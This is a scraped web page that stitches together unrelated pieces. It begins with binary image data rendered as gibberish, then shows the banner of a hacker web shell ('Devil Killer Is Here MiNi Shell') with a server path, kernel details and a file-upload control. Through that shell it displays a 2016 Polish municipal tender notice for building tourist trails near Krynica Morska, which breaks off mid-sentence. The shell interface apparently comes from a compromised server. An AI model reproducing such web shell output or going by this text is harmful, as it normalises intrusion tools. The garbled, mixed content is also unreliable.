JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161229/375649-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.krynicamorska.tv/' target='_blank'>http://bip.krynicamorska.tv/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 375649 - 2016
              z dnia 2016-12-29 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Krynica Morska: Wyznaczenie i budowa szlaków  na odcinkach: Przebrno  Krynica Morska; Krynica Morska  Piaski w ramach realizacji projektu pn. "Ochrona i zabezpieczenie obszarów chronionych poprzez rozbudowę infrastruktury ukierunkowującej ruch turystyczny w drodze wyznaczenia i budowy szlaków turystycznych na wybranych odcinkach leśnych od Mikoszewa do Granicy Państwa w Krynicy Morskiej"<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Ochrona i zabezpieczenie obszarów chronionych poprzez rozbudowę infrastruktury ukierunkowującej ruch turystyczny w drodze wyznaczenia i budowy szlaków turystycznych na wybranych odcinkach leśnych od Mikoszewa do Granicy Państwa w Krynicy Morskiej</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina  Miasta  Krynica  Morska, krajowy numer identyfikacyjny
              17000877400000, ul.
              ul. Górników 
              15,
              82120  
              Krynica Morska, woj.
              pomorskie, państwo
              Polska, tel.
              552 476 527, e-mail
              um@krynicamorska.tv, faks
              552 476 566.
              <br />
              Adres strony internetowej (URL): http://www.krynicamorska.tv/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.krynicamorska.tv/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.krynicamorska.tv/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać na adres Gminy<br />
                Adres:
                <br />Gmina Miasta Krynica Morska, ul. Górników 15, 82-120 Krynica Morska</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wyznaczenie i budowa szlaków  na odcinkach: Przebrno  Krynica Morska; Krynica Morska  Piaski w ramach realizacji projektu pn. "Ochrona i zabezpieczenie obszarów chronionych poprzez rozbudowę infrastruktury ukierunkowującej ruch turystyczny w drodze wyznaczenia i budowy szlaków turystycznych na wybranych odcinkach leśnych od Mikoszewa do Granicy Państwa w Krynicy Morskiej"<br /><b>Numer referencyjny: </b>ZP.271.3.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>3.1. Przedmiotem zamówienia jest wyznaczenie i budowa szlaków na odcinkach: Przebrno  Krynica Morska; Krynica Morska  Piaski w ramach realizacji projektu pn. Ochrona i zabezpieczenie obszarów chronionych poprzez rozbudowę infrastruktury ukierunkowującej ruch turystyczny w drodze wyznaczenia i budowy szlaków turystycznych na wybranych odcinkach leśnych od Mikoszewa do Granicy Państwa w Krynicy Morskiej.<br /><br /><b>II.5) Główny kod CPV: </b>45233140-2<br /><b> Dodatkowe kody CPV:</b>45233000-9,
                45233120-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              3933732.90<br />
              Waluta:
              <br /><div style="padding-left: 20px">zł<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                4.4. Zamówienia, o których mowa w punkcie 4.3 SIWZ będą do łącznej wartości nie przekraczającej 10 % wartości umowy. w okresie nie dłuższym niż 3 lata od udzielenia zamówienia podstawowego. Zakres rzeczowy tych zamówień będzie dotyczył świadczeń, które rzeczowo są przedmiotem zamówienia podstawowego lub świadczeń pozostających z nimi w bezpośrednim związku. Warunki zawarcia umowy będą kształtowane w sposób odpowiedni w oparciu o warunki umowy o zamówienie podstawowe z uwzględnieniem różnic wynikających z wartości, czasu realizacji i innych istotnych okoliczności mających miejsce w chwili udzielania zamówienia. <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 330<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Wykonawca wykaże, że: dysponuje odpowiednią zdolnością zawodową, tj. wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane polegające na budowie lub przebudowie drogi lub szlaku rowerowego lub ścieżki rowerowej o wartości zamówienia nie mniejszej niż 2 mln złotych każda. <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca wykaże, że: dysponuje odpowiednią zdolnością ekonomiczną i finansową, tj. posiada środki finansowe lub zdolność kredytową w wysokości 1 mln PLN;<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca wykaże, że: dysponuje następującymi osobami niezbędnymi do realizacji zamówienia:
a) kierownikiem robót budowlanych posiadającym uprawnienia do kierowania robotami  w specjalności drogowej bez ograniczeń lub odpowiadający im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub uprawnienia uznane na terytorium Rzeczypospolitej Polski na podstawie przepisów ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2016 r. poz. 65 ze zm.);<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpisu z właściwego rejestru  lub  z  centralnej  ewidencji  i  informacji  o działalności  gospodarczej,  jeżeli  odrębne  przepisy  wymagają  wpisu  do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie  art.  24  ust.  5  pkt  1  ustawy,  wystawionego  w  okresie  nie wcześniejszym  niż  6  miesięcy  przed  upływem  terminu  składania  ofert. W  przypadku  gdy  rejestr  jest  dostępny publicznie  nie  wymaga  się  złożenia tego dokumentu (dotyczy np. rejestru przedsiębiorców KRS, CEIDG); 

Jeżeli  Wykonawca  ma  siedzibę  lub  miejsce  zamieszkania  poza  terytorium 
Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt 7.2.5 
składa dokument lub dokumenty wystawione w kraju, w którym wykonawca 
ma  siedzibę  lub  miejsce  zamieszkania  potwierdzający,  że  nie  otwarto  jego 
likwidacji  ani  nie  ogłoszono  upadłości  wystawiony  nie  wcześniej  niż  6 
miesięcy przed upływem terminu składania ofert. 

 Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania 
lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się 
dokumentów,  o  których  mowa  w  pkt  7.2.5,  zastępuje  się  je  dokumentem 
zawierającym  odpowiednio  oświadczenie  wykonawcy,  ze  wskazaniem  osoby 
albo  osób  uprawnionych  do  jego  reprezentacji,  lub  oświadczenie  osoby, 
której  dokument  miał  dotyczyć,  złożone  przed  notariuszem  lub  przed 
organem sądowym, administracyjnym albo organem samorządu zawodowego lub   gospodarczego   właściwym   ze   względu   na   siedzibę   lub   miejsce zamieszkania  wykonawcy  lub  miejsce  zamieszkania  tej  osoby,  złożone  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /> wykaz    robót    budowlanych    potwierdzających    spełnianie    warunku 
doświadczenia  wykonawcy  opisanego  w  pkt  6.2.1  SIWZ,  wykonanych  nie 
wcześniej  niż  w  okresie  ostatnich  5  lat  przed  upływem  terminu  składania ofert  albo  wniosków  o  dopuszczenie  do  udziału  w  postępowaniu,  a  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty  te  zostały  wykonane,  z  załączeniem  dowodów  określających  czy  te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i 
prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje 
bądź  inne  dokumenty  wystawione  przez  podmiot,  na  rzecz  którego  roboty 
budowlane   były   wykonywane,   a   jeżeli   z   uzasadnionej   przyczyny   o 
obiektywnym  charakterze  wykonawca  nie  jest  w  stanie  uzyskać  tych 
dokumentów  -  inne  dokumenty;  wzór  wykazu  robót  budowlanych  stanowi 
załącznik nr 3 do SIWZ; 

wykazu osób, skierowanych przez  wykonawcę  do  realizacji  zamówienia 
publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,    uprawnień,  doświadczenia i wykształcenia niezbędnych do wykonania  zamówienia publicznego(odpowiednio do  warunku  określonego  w  pkt  6.2.3  SIWZ), a   także   zakresu wykonywanych   przez   nie   czynności   oraz   informacją o  podstawie  do  dysponowania  tymi  osobami;  wzór  wykazu  osób  stanowi załącznik nr 4 do SIWZ  

Informację z banku lub spółdzielczej kasy oszczędnościowo  kredytowej potwierdzającą  wysokość  posiadanych  środków  finansowych  lub  zdolność kredytową  Wykonawcy,  w  okresie  nie  wcześniejszym  niż  1  miesiąc  przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.  W  przypadku  gdy  Wykonawca  polega  w  zakresie  spełniania warunku   finansowego   na   zasobach   innych   podmiotów,   należy   złożyć informację   o   której   mowa   w   zdaniu   pierwszym   dotyczącą   podmiotu udostępniającego ten potencjał.  

Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych 
przez   zamawiającego   dokumentów,   o   których   mowa   w   pkt   7.2.3, 
zamawiający  dopuszcza  złożenie  przez  wykonawcę  innych  dokumentów, 
który  w  wystarczający  sposób  potwierdza  warunek  opisany  w  pkt  6.2.2 
niniejszej SIWZ. <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W terminie 3 dni od zamieszczenia przez zamawiającego informacji z otwarcia ofert na stronie internetowej, na której udostępniana jest SIWZ, 
wykonawcy składają bez wezwania oświadczenie o przynależności lub braku 
przynależności do tej samej grupy kapitałowej oraz, w przypadku przynależności do tej  samej  grupy  kapitałowej,  dowody  potwierdzające,  że powiązania  z  innym  wykonawcą  nie  prowadzą  do  zakłócenia  konkurencji  w postępowaniu. Wzór oświadczenia stanowi załącznik nr 5 do SIWZ.

 Wszystkie oświadczenia, o których mowa w pkt 7.1 SIWZ, składane są w 
oryginale,  zaś  dokumenty,  o  których  mowa  w  pkt  7.2  SIWZ,  mogą  być 
składane  w  formie  oryginału  lub  kopii  poświadczonej  za  zgodność  z 
oryginałem. 

Poświadczenia  za  zgodność  z  oryginałem  dokonuje  odpowiednio 
wykonawca,   podmiot,   na   którego   zdolnościach   lub   sytuacji   polega wykonawca,  wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia publicznego  albo  podwykonawca,  w  zakresie  dokumentów,  które  każdego  z nich dotyczą. 

Dokumenty sporządzone w języku obcym muszą być składane wraz 
z tłumaczeniem na język polski. 

W  przypadku  złożenia  przez  wykonawców  dokumentów zawierających dane wyrażone w innych walutach niż PLN, Zamawiający jako kurs  przeliczeniowy  waluty,  w  której  oszacowano  daną  wartość, przyjmie średni  kurs  Narodowego  Banku  Polskiego  (NBP) obowiązujący  w  dniu publikacji ogłoszenia o zamówieniu w Dzienniku Urzędowym UE.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Zamawiający żąda od wykonawców wniesienia wadium w wysokości: 100 000,00 zł (słownie: sto tysięcy złotych 00/100)

Wykonawcy  zobowiązani  są  wnieść  wadium  przed  upływem  terminu 
składania  ofert.  Wadium  może  być  wnoszone  w  jednej  lub  kilku  następujących formach: 
-  pieniądzu; 
-  poręczeniach   bankowych   lub   poręczeniach   spółdzielczej   kasy 
oszczędnościowo-kredytowej,   z   tym   że   poręczenie   kasy   jest   zawsze poręczeniem pieniężnym; 
-  gwarancjach bankowych; 
-  gwarancjach ubezpieczeniowych; 
-  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b 
ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji 
Rozwoju Przedsiębiorczości. 

Wadium wnoszone w pieniądzu wpłaca się przelewem na poniżej wskazany 
rachunek  bankowy  Zamawiającego:  BS  STEGNA  84  8308  0001  0006  1681 
2000  0070  z  dopiskiem:  ,,Wadium  w  postępowaniu  pn.:  Wyznaczenie  i 
budowa  szlaków    na  odcinkach:  Przebrno    Krynica  Morska;  Krynica 
Morska      Piaski   w   ramach   realizacji   projektu   pn.   "Ochrona   i zabezpieczenie obszarów chronionych poprzez rozbudowę infrastruktury 
ukierunkowującej  ruch  turystyczny  w  drodze  wyznaczenia  i  budowy 
szlaków  turystycznych  na  wybranych  odcinkach  leśnych  od  Mikoszewa 
do Granicy Państwa w Krynicy Morskiej (ZP.271.3.2016). 

W przypadku wnoszenia przez wykonawcę wadium w formie pieniądza do 
oferty należy załączyć kopię przelewu. W przypadku wnoszenia przez wykonawcę wadium  w  formie  określonej  w  pkt  10.2.2.    10.2.5,  zobowiązany  jest  on dostarczyć  Zamawiającemu  oryginał  właściwego  dokumentu  poręczenia  lub gwarancji razem z ofertą.  

Wadium  wniesione  w  pieniądzu  zamawiający  przechowuje  na  rachunku 
bankowym. 

Zamawiający  zwraca  wadium  wszystkim  wykonawcom,  niezwłocznie  po 
wyborze  oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy,   którego   oferta   została   wybrana   jako   najkorzystniejsza,   z zastrzeżeniem pkt 10.11.4 niniejszej SIWZ 

Wykonawcy,   którego   oferta   została   wybrana   jako najkorzystniejsza, 
Zamawiający  zwraca  wadium  niezwłocznie  po  zawarciu  umowy  w  sprawie 
zamówienia  publicznego  oraz  wniesieniu  zabezpieczenia  należytego  wykonania umowy. 

Zamawiający  zwraca  niezwłocznie  wadium  na  wniosek  wykonawcy,  który 
wycofał ofertę przed upływem terminu składania ofert. 

Zamawiający  żąda  ponownego  wniesienia  wadium  przez  wykonawcę, 
któremu   zwrócono   wadium   na   podstawie   punktu   10.6,   jeżeli   w   wyniku rozstrzygnięcia  odwołania  jego  oferta  zostanie  wybrana  jako  najkorzystniejsza. 
Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 

Jeżeli  wadium  wniesiono  w  pieniądzu,  Zamawiający  zwraca  je  wraz 
z odsetkami  wynikającymi  z  umowy  rachunku  bankowego,  na  którym  było  ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji  bankowej  za  przelew  pieniędzy  na  rachunek  bankowy  wskazany  przez Wykonawcę. 

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli: 
- wykonawca,  którego  oferta  została  wybrana,  odmówił  podpisania 
umowy  w sprawie  zamówienia  publicznego  na  warunkach  określonych  w 
ofercie; 
- wykonawca,    którego    oferta    została    wybrana,    nie    wniósł 
wymaganego zabezpieczenia należytego wykonania umowy;  
- zawarcie  umowy  w  sprawie  zamówienia  publicznego  stało  się 
